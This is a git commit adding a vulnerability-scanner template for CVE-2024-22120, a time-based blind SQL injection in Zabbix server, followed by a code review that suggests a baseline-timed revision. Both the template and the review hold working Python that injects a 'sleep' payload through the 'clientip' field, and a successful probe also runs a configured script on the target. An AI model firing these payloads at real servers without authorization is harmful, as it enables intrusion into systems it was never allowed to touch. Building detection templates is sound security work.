Create CVE-2024-22120.yaml
parent
e0f7bb4632
commit
a1e77eded0
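--- /dev/null
+++ b/CVE-2024-22120.yaml
@@ -0,0 +1,56 @@
+id: CVE-2024-22120
+
+info:
+name: Zabbix Server - Time-Based Blind SQL injection
+author: CodeStuffBreakThings
+severity: critical
+description: |
+The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
+remediation: |
+Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
+reference:
+- https://support.zabbix.com/browse/ZBX-24505#/
+- https://github.com/W01fh4cker/CVE-2024-22120-RCE
+- https://nvd.nist.gov/vuln/detail/CVE-2024-22120
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+cvss-score: 9.1
+cve-id: CVE-2024-22120
+tags: zabbix,sqli,cve,cve2024,authenticated
+
+variables:
+HOST: "{{Host}}"
+PORT: "{{Port}}"
+SID: "{{SID}}"
+HOSTID: "{{HOSTID}}"
+
+code:
+- engine:
+- py
+- python3
+source: |
+import os, struct, socket
+from datetime import datetime
+hostname=os.getenv('HOST')
+port=int(os.getenv('PORT'))
+sid=os.getenv('SID')
+hostid=os.getenv('HOSTID')
+zbx_header = "ZBXD\x01".encode()
+message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
+message_length = struct.pack('<q', len(message_json))
+message = zbx_header + message_length + message_json.encode()
+before_query = datetime.now().timestamp()
+s = socket.socket()
+s.connect((hostname,port))
+s.send(message)
+response = s.recv(1024)
+s.close()
+after_query = datetime.now().timestamp()
+responsetime = after_query - before_query
+if responsetime >= 10 and zbx_header in response:
+print("Vulnerable to CVE-2024-22120")
+
+matchers:
+- type: word
+words:
+- "Vulnerable to CVE-2024-22120"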
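Review bot: The socket in the `source` block (`s = socket.socket()` through `s.recv(1024)`) has no timeout, so a host that accepts the TCP connection but never answers blocks the template indefinitely, and `responsetime >= 10` is a single absolute measurement with no baseline, so a slow or overloaded server can trip the match without any injection having happened. I would open the connection with `socket.create_connection((hostname, port), timeout=30)` inside a `with`, use `sendall`, and send a control probe with `sleep(0)` first so the match requires the delta between the two timings, as sketched below. `sleep(10)` is MySQL syntax, so a PostgreSQL-backed Zabbix will silently produce no finding; that limitation belongs in `description` at least (I cannot tell from here whether a `pg_sleep` variant is safe to add as a second payload). Note also that a successful probe actually runs the hard-coded `scriptid: "3"` on `HOSTID` as a side effect, so the check is intrusive and the template text should say so.
```python
# … unchanged: env reads and zbx_header …
def probe(clientip):
    body = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"" + clientip + "\", \"hostid\": \"" + hostid + "\"}"
    msg = zbx_header + struct.pack('<q', len(body)) + body.encode()
    start = datetime.now().timestamp()
    # timeout bounds a silent peer; the with-block closes the socket on any error
    with socket.create_connection((hostname, port), timeout=30) as s:
        s.sendall(msg)
        reply = s.recv(1024)
    return datetime.now().timestamp() - start, reply

baseline, _ = probe("' + (select sleep(0)) + '")
delay, response = probe("' + (select sleep(10)) + '")
# require the injected delay on top of the server's own latency
if delay - baseline >= 9 and zbx_header in response:
    print("Vulnerable to CVE-2024-22120")
```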
|
Loading…
Reference in New Issue